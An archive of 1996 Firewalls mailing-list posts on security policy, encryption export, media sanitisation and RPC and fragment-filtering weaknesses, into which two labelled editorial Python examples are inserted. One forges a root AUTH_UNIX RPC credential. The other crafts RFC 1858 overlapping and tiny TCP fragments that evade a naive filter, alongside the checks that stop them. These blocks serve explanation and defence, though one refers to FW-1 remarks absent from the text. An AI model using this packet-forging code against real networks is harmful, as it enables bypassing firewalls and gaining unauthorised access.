-Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Thu Jan 11 19:28:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18398 for firewalls-outgoing; Thu, 11 Jan 1996 18:54:12 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18363 for ; Thu, 11 Jan 1996 18:53:57 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id SAA04948; Thu, 11 Jan 1996 18:50:58 -0800 Received: from ix2.ix.netcom.com(199.182.120.1) by mycroft via smap (V1.3mjr) id sma004933; Thu Jan 11 18:50:06 1996 Received: from ix-wp1-08.ix.netcom.com by ix2.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id SAA27489; Thu, 11 Jan 1996 18:51:10 -0800 Date: Thu, 11 Jan 1996 18:51:10 -0800 Message-Id: <199601120251.SAA27489@ix2.ix.netcom.com> X-Sender: sgfarkas@ix.netcom.com (Unverified) X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Andrew Cameron , firewalls@greatcircle.com From: SorG Farkas Subject: Re: Internet Policy/Security Policy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Check out the http://all.net site. They have lots of useful info. At 10:11 PM 1/10/96 +0200, Andrew Cameron wrote: > >I would like to know where I can find examples of an Internet/Security >Policy for a company. > >I will need to write one in the near future and would like to draw on >the experience of others.
> >Thanks in anticipation > >----------------------------------------------------------------------------- > >Andrew Cameron >Internet : andrew@andy.alt.za >X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400 > >---------------------------------------------------------------------------- > > > From firewalls-owner Thu Jan 11 19:32:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18475 for firewalls-outgoing; Thu, 11 Jan 1996 18:55:45 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18438 for ; Thu, 11 Jan 1996 18:55:35 -0800 (PST) Received: from pferguso-pc.cisco.com (c3robo6.cisco.com [171.68.13.48]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id SAA08629; Thu, 11 Jan 1996 18:54:06 -0800 Message-Id: <199601120254.SAA08629@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jan 1996 21:54:37 -0500 To: "Archer, Barry J." From: Paul Ferguson Subject: Re: Encryption export laws from US... Cc: "'Firewalls Digest'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I was merely observing that, while the topic of encryption may or may not be wholly relevant to firewalls, the cypherpunks list is one of the few mailing lists dedicated to this topic. There is also sci.crypt, but USENET is another topic altogether. -paul ps. thanks for the kind words. ,-) At 09:21 AM 1/11/96 PST, Archer, Barry J. wrote: > > *Very* rare for me to see anything from Paul Ferguson that I disagree >with, but I think this thread is very applicable to firewall discussions. > One of the major can'o'worms I face is how to set up secure USER to >Firewall sessions over the Internet. It's not a matter of whether or not I >like it, it's coming. 
> > Firewall to Firewall encryption is great, but when you have nomadic >remote users and small international offices individual access gets >important for a lot of folks. Plus, some countries now seem to have more >reliable Internet access than private voice/data line access...which is >actually what prompted the first inquiry I got for 'why can't I..." > > My nightmare is a different solution for each and every country... > > Barry Archer > archerbj@bv.com > > "These opinions are mine, Mine, MINE!" - me > "Who cares?" - my cat > >>From: Paul Ferguson >>Date: Wed, 10 Jan 1996 21:23:26 -0500 >>Subject: Re: Encryption export laws from US.. >> >>You may want to redirect this request to the cypherpunks mailing >>list instead, where you have a more on-topic >>audience. >> >>- - paul > > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 11 19:38:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA18849 for firewalls-outgoing; Thu, 11 Jan 1996 19:22:02 -0800 (PST) Received: from locon.mtnlake.com (locon.mtnlake.com [165.154.24.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA18844 for ; Thu, 11 Jan 1996 19:21:55 -0800 (PST) Received: from unknown by locon.mtnlake.com with smtp (Smail3.1.29.1 #1) id m0taVH4-000E0AC; Thu, 11 Jan 96 22:15 From: heuman@mtnlake.com (R.S. (Bob) Heuman) To: "A. Padgett Peterson, P.E. 
Information Security" Cc: firewalls@greatcircle.com Subject: Re: "Please reply to Email address and not to the list" Date: Thu, 11 Jan 1996 22:20:22 -0500 Reply-To: heuman@mtnlake.com Message-Id: <30f5d148.11554455@mailserv.mtnlake.com> References: <960111090536.20200f9e@hobbes.orl.mmc.com> In-Reply-To: <960111090536.20200f9e@hobbes.orl.mmc.com> X-Mailer: Forte Agent .99d/32.168 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996 9:05:36 -0500 (EST), you wrote: >>I would appreciate it if you can take a moment to respond to my email address >>(not the whole list) to "vote" on if you think SNMP traffic should pass through >>a Firewall. > >Is hard to do if the E-mail address is not in the body of the message and >your E-Mail system does not preserve headers. PLEASE, if you want a direct >reply, end the message with a name and E-mail address. > > Warmly, > Padgett Padgett, also note that sometimes the messages bounce back since the address used and therefore pickup up for the reply is not the address recognised for responses. I see a lot of university addresses where a specific machine id is added to the sender's address, yet needs to be stripped out of the reply address or the mail is returned undeliverable. I agree - put your address(es) at the end of the message if you want a response... 
Bob From firewalls-owner Thu Jan 11 21:02:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA21029 for firewalls-outgoing; Thu, 11 Jan 1996 20:51:18 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA21022 for ; Thu, 11 Jan 1996 20:51:14 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id XAA21054 for ; Thu, 11 Jan 1996 23:50:14 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id XAA13122; Thu, 11 Jan 1996 23:50:10 -0500 (EST) Date: Thu, 11 Jan 1996 23:50:08 -0500 (EST) From: "Paul D. Robertson" To: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Brain21 wrote: > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > email (3 complete overwrites with random data if I recall correctly) and then > > I thought that the NSA could read approx. 7 writes deep. If thought that > you just put bullets in those drives (quite literally) instead of > rewriting them. > I'm sure someone who has a better memory will correct me, but I think three or five complete overwrites used to be approved for up to secret (no longer approved, and may have actually been for up to top secret, memory fades). Bullets are not an approved destruction method (nor is eating, I recall looking that up once to answer a bet), and never have been, to the best of my knowledge. We always used to require physical destruction, as I remember it, for anything above SBU. Course, I could be remembering wrongly, because if I think too hard about those days, I'll have to kill me....
If anyone's around in May of 2053, and I'm not senile, I'll have some cool stories :) Back before I entered the world of real classified, we had a big green sledgehammer with which to destroy our secret wartime data that resided on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly wielded was I would suppose approved for emergency destruction only. I don't think they trusted us with too many thermite grenades :( Paul "What PROFS note?" Robertson ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Thu Jan 11 21:14:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA21444 for firewalls-outgoing; Thu, 11 Jan 1996 20:58:58 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA21439 for ; Thu, 11 Jan 1996 20:58:51 -0800 (PST) Message-Id: <199601120458.UAA21439@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA131152694; Fri, 12 Jan 1996 15:58:14 +1100 From: Darren Reed Subject: Re: Firewalls-Digest V5 #14 To: murrell@bctel.net (Brian Murrell) Date: Fri, 12 Jan 1996 15:58:14 +1100 (EDT) Cc: Firewalls@GreatCircle.COM, mjr@switchblade.v-one.com In-Reply-To: <199601111705.JAA18920@mocha.bctel.net> from "Brian Murrell" at Jan 11, 96 09:05:29 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk RPC (Remote Procedure Call) on all systems except those with NIS+ (ie Solaris 2) typically use "Unix" authentication, if any. The classic examples of this are NFS and rexd.
Solaris 2 now supports credentials held using DES with public/private keys of 192 (or thereabouts) bits in size, but if you want to change your NIS+ password and have a number of replicas > 0, you MUST turn OFF using DES credentials - ie you remove security to perform a secure operation. AFAIK, few programs, and mostly only those with Solaris2 use or require DES credentials. What's more worrying is RPC programs written which have other goals in mind, but allow some sort of shell access, based on "Unix" authentication... RPC services register themselves through a service daemon (portmapper) which allocates them a UDP/TCP port and records details about the service occupying that port. Usually you ask the portmapper for details about where to find a service, but this can be avoided. Even though it is possible to put access control on the portmapper, this doesn't stop people talking directly to RPC daemons, which can be configured through inetd or on their own, making it hard to setup an access policy. The RPC model is a good one, but this implementation is lacking. On a similar note, does anyone allow DCE/DFS through a firewall, or have any comments about its usefulness in such an environment ?
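[Editor's added example, not part of Darren Reed's message or of Brent Chapman's FW-1 remarks above.] The two points both posters make about RPC, that "Unix" authentication is nothing more than a uid/gid the client writes into the message, and that the portmapper is only a directory which a client is free to skip, are easiest to see from the bytes. The Python below encodes an ONC RPC CALL with an AUTH_UNIX credential in the RFC 1057 layout and decodes a PMAPPROC_DUMP reply of the kind a filter like FW-1 would have to watch. All data is constructed in memory; nothing is sent on the wire. The program numbers are the standard ones (portmapper 100000, NFS 100003, mountd 100005); the machine name, ports and mapping table are made-up sample values.

```python
import struct

# Well-known ONC RPC constants (RFC 1057): portmapper program, version and
# DUMP procedure, the two auth flavours used here, and the message types.
PMAP_PROG, PMAP_VERS, PMAPPROC_DUMP = 100000, 2, 4
AUTH_NULL, AUTH_UNIX = 0, 1
MSG_CALL, MSG_REPLY = 0, 1


def xdr_u32(n):
    return struct.pack(">I", n)


def xdr_opaque(b):
    # XDR variable-length opaque/string: 4-byte length, data, pad to 4 bytes
    return xdr_u32(len(b)) + b + b"\0" * (-len(b) % 4)


class XdrReader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def u32(self):
        (v,) = struct.unpack_from(">I", self.data, self.pos)
        self.pos += 4
        return v

    def opaque(self):
        n = self.u32()
        b = self.data[self.pos:self.pos + n]
        self.pos += n + (-n % 4)
        return b


def auth_unix(uid, gid, gids=(), machine=b"client", stamp=0):
    """AUTH_UNIX credential. Nothing in it is verified by anyone: the client
    writes whatever uid/gid it likes, so the 'authentication' is assertion."""
    body = xdr_u32(stamp) + xdr_opaque(machine) + xdr_u32(uid) + xdr_u32(gid)
    body += xdr_u32(len(gids)) + b"".join(xdr_u32(g) for g in gids)
    return xdr_u32(AUTH_UNIX) + xdr_opaque(body)


def parse_auth_unix(cred):
    """What an RPC server sees when it unpacks the credential it was sent."""
    r = XdrReader(cred)
    if r.u32() != AUTH_UNIX:
        raise ValueError("not an AUTH_UNIX credential")
    body = XdrReader(r.opaque())
    stamp, machine, uid, gid = body.u32(), body.opaque(), body.u32(), body.u32()
    gids = [body.u32() for _ in range(body.u32())]
    return {"stamp": stamp, "machine": machine, "uid": uid, "gid": gid, "gids": gids}


def rpc_call(xid, prog, vers, proc, cred, args=b""):
    """RPC CALL message (the UDP payload, or what follows the record mark on
    TCP). The verifier is AUTH_NULL, as it always is for AUTH_UNIX calls."""
    verf = xdr_u32(AUTH_NULL) + xdr_u32(0)
    hdr = b"".join(xdr_u32(v) for v in (xid, MSG_CALL, 2, prog, vers, proc))
    return hdr + cred + verf + args


def pmap_dump_reply(xid, mappings):
    """Encode a PMAPPROC_DUMP reply; used here only to construct sample input."""
    out = b"".join(xdr_u32(v) for v in (xid, MSG_REPLY, 0, AUTH_NULL, 0, 0))
    for prog, vers, prot, port in mappings:
        out += xdr_u32(1) + b"".join(xdr_u32(v) for v in (prog, vers, prot, port))
    return out + xdr_u32(0)  # terminates the XDR linked list


def parse_dump_reply(data, expect_xid):
    """Decode the portmapper's answer into (prog, vers, prot, port) tuples."""
    r = XdrReader(data)
    if r.u32() != expect_xid:
        raise ValueError("xid mismatch")
    if r.u32() != MSG_REPLY or r.u32() != 0:  # reply_stat MSG_ACCEPTED
        raise ValueError("call was not accepted")
    r.u32()                                   # server verifier flavour
    r.opaque()                                # server verifier body
    if r.u32() != 0:                          # accept_stat SUCCESS
        raise ValueError("procedure failed")
    mappings = []
    while r.u32() == 1:
        mappings.append((r.u32(), r.u32(), r.u32(), r.u32()))
    return mappings


def direct_endpoint(mappings, prog, vers, prot):
    """Once a client knows (or guesses) this port it can talk to the service
    directly, so an access list on the portmapper alone protects nothing."""
    for p, v, pr, port in mappings:
        if (p, v, pr) == (prog, vers, prot):
            return port
    return None


if __name__ == "__main__":
    # Constructed sample: a dump advertising NFS over UDP and mountd over TCP.
    sample = pmap_dump_reply(7, [(100003, 2, 17, 2049), (100005, 1, 6, 1023)])
    table = parse_dump_reply(sample, 7)
    print("mountd is on TCP port", direct_endpoint(table, 100005, 1, 6))
    forged = rpc_call(8, 100005, 1, 1, auth_unix(0, 0, machine=b"anyhost"))
    print("server would see", parse_auth_unix(forged[24:]))
```

The forged call asserts uid 0 from a host name of the sender's choosing; a server trusting AUTH_UNIX has no way to tell it from a genuine root client, which is why the protections of the period (export lists, portmapper ACLs) were bolted on around the credential rather than derived from it.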
darren From firewalls-owner Thu Jan 11 21:29:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA21984 for firewalls-outgoing; Thu, 11 Jan 1996 21:08:12 -0800 (PST) Received: from hal-pc.org (hal-pc.org [204.52.135.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id VAA21959 for ; Thu, 11 Jan 1996 21:08:04 -0800 (PST) Received: from pm0-43.hal-pc.org (pm0-43.hal-pc.org [206.66.129.43]) by hal-pc.org (8.6.11/8.6.9) with SMTP id XAA02365; Thu, 11 Jan 1996 23:06:35 -0600 Message-Id: <199601120506.XAA02365@hal-pc.org> Comments: Authenticated sender is From: "robertp@hal-pc.org" To: Andrew Cameron , Robert Hart Date: Thu, 11 Jan 1996 23:01:48 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Internet Policy/Security Policy CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Wed, 10 Jan 1996, Andrew Cameron wrote: > > > > > I would like to know where I can find examples of an Internet/Security > > Policy for a company. > > > > I will need to write one in the near future and would like to draw on > > the experience of others. > > Well, I have found the O'Reilly book "Building Internet Firewalls" > chapter on this quite useful as I have been drafting up a policy for here... > > --- > Robert Hart hartr@hedunx.hedland.edu.au > Voice: +61 (0)91 72 0429 Fax: +61 (0)91 72 3560 > Hedland College, PMB 1, South Hedland WA 6722 Australia > I would recommend that you Review RFC 1244 - Site Security Handbook, NIST Special Publication 800-10, Draft IETF-SSH-Handbook-00 - Site Security Handbook for System and Network Administrators an Internet Draft from the Network Working Group SEI/CMU and possibly RFC 1636 - Report of IAB Workshop on Security in the Internet Architecture.
While not specifically germane to firewalls, another question I have is, can a "sign-on banner" take the place of a signed "User Responsibility Statement?" The scenario would be, when a person signs on a system, his start-up banner would state that by signing on he/she signifies they have previously read and understood all applicable security policies and procedures regarding accessing the Internet via company XXX's systems and have agreed to abide by them." (or similar words). The logic is to do away with the logistics and manpower necessary to have all (a large number)of employees sign an actual user responsibility statement. Any comments gratefully accepted Bob Plaumann robertp@hal-pc.org Logic is to try and get away from From firewalls-owner Thu Jan 11 21:48:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA23584 for firewalls-outgoing; Thu, 11 Jan 1996 21:35:17 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA23577 for ; Thu, 11 Jan 1996 21:35:11 -0800 (PST) Message-Id: <199601120535.VAA23577@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA145124868; Fri, 12 Jan 1996 16:34:28 +1100 From: Darren Reed Subject: Re: Firewalls-Digest V5 #14 To: mjr@switchblade.v-one.com Date: Fri, 12 Jan 1996 16:34:27 +1100 (EDT) Cc: murrell@bctel.net, Firewalls@GreatCircle.COM In-Reply-To: <199601111913.OAA13809@switchblade.v-one.com> from "Marcus J. Ranum" at Jan 11, 96 02:13:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Marcus J. Ranum, sie said: [...] > The argument of "application level" versus "smart packet > filtering" or "dynamic screening" or whatever it's being called > this week is a really silly one. The question is: DOES THE THING > DO WHAT IT HAS TO DO?
Classical application level proxies are > an implementation detail based on the ease with which one can > take advantage of the kernel's state-maintenance for TCP sessions, > and the fact that it is easier to write application code than > kernel code, if you haven't got a kernel source license. That's > it. > > Where things get interesting is when the smart packet > filters get to the point where they can perform very detailed > checks (checks which, typically, are easier to do in application > code than kernel code) if those are what is required. I see a > lot of firewalls that use plug-gw all over the place. As far > as I am concerned, plug-gw is axiomatically equal to allowing > a hole through a router. The firewall is a no-op except for > the audit trail. Therefore, a router with a hole, and a sniffer > with a log are equal to the firewall in that case (only faster). [...] Something else which *really* bothers me about FW-1 is fragments and reassembly. If FW-1 is performing reassembly, it is no longer a packet filter/screen. What I find rather bemusing about their advertising crap for V2.0 is the claim it does away with fragments. That is simply not possible unless it forces path MTU discovery to be used and otherwise rejects all fragments. The latter is probably a good thing anyway (and I'd *strongly* recommend it to everyone given the trouble fragments have caused packet filters in the last 12 months), but as it isn't an end-point for any communications, I'm *sure* there are going to be situations where FW-1 can be made to let a packet through based on incorrect reassembly. At least using plug-gw, everything is put back into shape before being shipped on up to the proxy which does the relaying, etc. Doing things like rewriting packets (as does ipfw in linux) as part of its IP masquerading, for FTP, is another one of those "dangerous" things, looking for trouble.
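[Editor's added example, not part of Darren Reed's message and not code from FW-1, plug-gw or any other product.] The "trouble fragments have caused packet filters" that Darren alludes to is the pair of attacks written up in RFC 1858 (October 1995): a first fragment that the screening rule accepts, followed by a fragment at offset 1 that rewrites the TCP flags once the end host reassembles, and a first fragment so short that the flags never reach the filter at all. The Python below builds both against the typical policy of the day (let TCP in only if it is not a connection request, so that only replies to outgoing connections get through), shows a filter that examines only first fragments passing them, shows a host that lets later fragments overwrite earlier bytes ending up with a SYN, and then applies the two RFC 1858 checks. Addresses, ports and the "later fragment wins" reassembly policy are constructed for the demonstration; real stacks of the period differed in which copy they kept, which is exactly why a screen that is not the end point cannot know what the host will see.

```python
import struct

IP_PROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10


def _ip4(s):
    return bytes(int(x) for x in s.split("."))


def ip_checksum(hdr):
    total = sum(struct.unpack(">%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_header(ident, frag_off, more_frags, payload_len, proto=IP_PROTO_TCP,
              src="10.0.0.1", dst="192.0.2.10"):
    """20-byte IPv4 header; frag_off is in 8-byte units, as on the wire.
    The addresses are constructed sample values."""
    flags_off = (0x2000 if more_frags else 0) | (frag_off & 0x1FFF)
    hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                      flags_off, 64, proto, 0, _ip4(src), _ip4(dst))
    return hdr[:10] + struct.pack(">H", ip_checksum(hdr)) + hdr[12:]


def tcp_header(sport, dport, seq, ack, flags, window=8192):
    # 20-byte TCP header, no options; checksum left zero (irrelevant here)
    return struct.pack(">HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)


def parse_frag(pkt):
    ver_ihl, _, total, ident, flags_off, _, proto, _, _, _ = struct.unpack(">BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0xF) * 4
    return {"ident": ident, "proto": proto, "fo": flags_off & 0x1FFF,
            "mf": bool(flags_off & 0x2000), "data": pkt[ihl:total]}


def naive_filter(pkt):
    """Screening rule: inbound TCP passes only if it is not a connection request
    (SYN without ACK). Non-first fragments carry no TCP header, so the filter
    cannot examine them and passes them on trust."""
    f = parse_frag(pkt)
    if f["proto"] != IP_PROTO_TCP:
        return "DROP"
    if f["fo"] != 0:
        return "PASS"
    flags = f["data"][13] if len(f["data"]) > 13 else 0  # absent flags byte reads as 0
    return "DROP" if (flags & TCP_SYN and not flags & TCP_ACK) else "PASS"


def rfc1858_filter(pkt):
    """Same policy with the RFC 1858 checks in front: a TCP fragment at offset 1
    can only exist to overwrite the flags, and a first fragment must carry enough
    header (16 bytes here) for the flags byte to be inspected."""
    f = parse_frag(pkt)
    if f["proto"] == IP_PROTO_TCP:
        if f["fo"] == 1:
            return "DROP"
        if f["fo"] == 0 and len(f["data"]) < 16:
            return "DROP"
    return naive_filter(pkt)


def reassemble_overwrite(frags):
    """Reassembly in which a later fragment's bytes replace earlier ones at the
    same offset (one of several policies hosts used; assumed for the demo)."""
    buf = bytearray()
    for pkt in frags:
        f = parse_frag(pkt)
        start, end = f["fo"] * 8, f["fo"] * 8 + len(f["data"])
        if len(buf) < end:
            buf.extend(b"\0" * (end - len(buf)))
        buf[start:end] = f["data"]
    return bytes(buf)


def overlap_attack(ident=0x1234, dport=23):
    """Fragment 0: a full TCP header that looks like an established flow (ACK).
    Fragment 1: offset 1 (byte 8) carrying the ack/flags/window tail of a SYN."""
    benign = tcp_header(40000, dport, 1, 1, TCP_ACK)
    real = tcp_header(40000, dport, 1, 0, TCP_SYN)
    return [ip_header(ident, 0, True, 20) + benign,
            ip_header(ident, 1, False, 12) + real[8:20]]


def tiny_first_fragment(ident=0x1235, dport=23):
    """Only ports and sequence number in fragment 0; the flags never reach the filter."""
    real = tcp_header(40000, dport, 1, 0, TCP_SYN)
    return ip_header(ident, 0, True, 8) + real[:8]


def tcp_flags(transport):
    return transport[13]


if __name__ == "__main__":
    frags = overlap_attack()
    print("naive filter:", [naive_filter(p) for p in frags])
    print("host sees flags 0x%02x (SYN is 0x02)" % tcp_flags(reassemble_overwrite(frags)))
    print("RFC 1858 filter:", [rfc1858_filter(p) for p in frags])
    print("tiny first fragment:", naive_filter(tiny_first_fragment()), rfc1858_filter(tiny_first_fragment()))
```

Rejecting all fragments outright, as Darren recommends, is the blunt form of the same fix; the two targeted checks keep ordinary fragmented traffic working while closing both holes, but only for protocols whose header layout the filter knows.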
darren From firewalls-owner Thu Jan 11 22:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA25334 for firewalls-outgoing; Thu, 11 Jan 1996 22:02:06 -0800 (PST) Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA25316 for ; Thu, 11 Jan 1996 22:02:01 -0800 (PST) Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id VAA26634 for ; Thu, 11 Jan 1996 21:48:01 -0800 Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id VAA26630 for ; Thu, 11 Jan 1996 21:48:01 -0800 Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id WAA29051; Thu, 11 Jan 1996 22:00:45 -0800 Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id WAA06595; Thu, 11 Jan 1996 22:03:39 -0800 From: "Alan C.Horn" Message-Id: <9601112203.ZM6593@juice.dreamworks.com> Date: Thu, 11 Jan 1996 22:03:37 -0800 X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail) To: firewalls@greatcircle.com Subject: Re: Encryption export laws from US... Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --- Forwarded mail from Paul Ferguson I was merely observing that, while the topic of encryption may or may not be wholly relevant to firewalls, the cypherpunks list is one of the few mailing lists dedicated to this topic. There is also sci.crypt, but USENET is another topic altogether. -paul ps. thanks for the kind words. ,-) --- I'm not a cypherpunk, so I wouldn't be following that list. I am however a computer professional tasked with setting up secure communications of source code running a parallel RCS system between two firewalls in different countries. 
My personal response to my employer was 'DAT tape and federal express sounds like a pretty good solution', however they want to go all high tech on me :) So I asked the question on the one list that I have always received good information from in the past. Perhaps I should have mentioned the word 'firewall' in my initial question, would that have been more clear ? :) ObRelevantBit : Incidentally, I received several very helpful replies from people, many thanks to all concerned. Thanks Al -- Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000) GAT d? H++ s+:+ !g p1 !au a- w- v++ C++ ULI++++ P+++ L++ 3 E- N++ K W-- M- V-- po Y+ t 5 !j R G tv b+++ D+(++) B? e- u** h f++ r++ n+ y+ [Personal Email : deorth@mono.org] [Work Email : ahorn@dreamworks.com] From firewalls-owner Thu Jan 11 22:44:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA26788 for firewalls-outgoing; Thu, 11 Jan 1996 22:32:27 -0800 (PST) Received: from archimedes.vislab.navy.mil (archimedes.chinalake.navy.mil [129.131.31.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA26783 for ; Thu, 11 Jan 1996 22:32:23 -0800 (PST) Received: from archimedes.vislab.navy.mil (parcival.vislab.navy.mil [129.131.31.12]) by archimedes.vislab.navy.mil (current-1701B/current-CL-CL) with ESMTP id WAA24634; Thu, 11 Jan 1996 22:33:04 -0800 Posted-Date: Thu, 11 Jan 1996 22:33:04 -0800 Message-Id: <199601120633.WAA24634@archimedes.vislab.navy.mil> To: "Paul D. Robertson" cc: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-reply-to: Your message of "Thu, 11 Jan 1996 23:50:08 EST." 
Date: Thu, 11 Jan 1996 22:32:55 -0800 From: Benjamin Allan Smith Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message you wrote: > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > email (3 complete overwrites with random data if I recall correctly) and > > > > I thought that the NSA could read approx. 7 writes deep. If thought that > > you just put bullets in those drives (quite literally) instead of > > rewriting them. > > > > I'm sure someone who has a better memory will correct me, but I think > three or five complete overwrites used to be approved for up to secret > (no longer approved, and may have actually been for up to top secret, > memory fades). I couldn't quickly find the specs, but in the case that I mentioned we were reusing the disks and had to verify every copy of the data had been erased. Physical security of the disks was maintained so they were reused. It seems to me that it would be impossible for a cracker to read N writes ago without physical access to the disk *and* special equipment. (Isn't the technique X-ray crystallography to read N writes ago?) If memory serves, magnetic media that have had Secret data on them may be declassified after 10 writes. Magnetic media with Top Secret and higher may never be declassified and must be destroyed by physically destroying the media (shredding) and incinerating the pieces. (Ironically I was able to easily find "Destruction of Equipment [Land Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, 4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) Ben ------------------------------------------------------------------------------- Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88 Science Applications International Corporation Naval Air Warfare Center, Weapons Division, China Lake "...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere.
He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie From firewalls-owner Thu Jan 11 22:59:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA28683 for firewalls-outgoing; Thu, 11 Jan 1996 22:54:58 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA28678 for ; Thu, 11 Jan 1996 22:54:53 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id BAA21902; Fri, 12 Jan 1996 01:52:51 -0500 Date: Fri, 12 Jan 1996 01:52:51 -0500 (EST) From: Brain21 To: Jim Meritt cc: firewalls@GreatCircle.COM, Benjamin Allan Smith Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: <9600118213.AA821396873@smtpinet.aspensys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Jim Meritt wrote: > Concur. DISNET yes. Internet no. > > 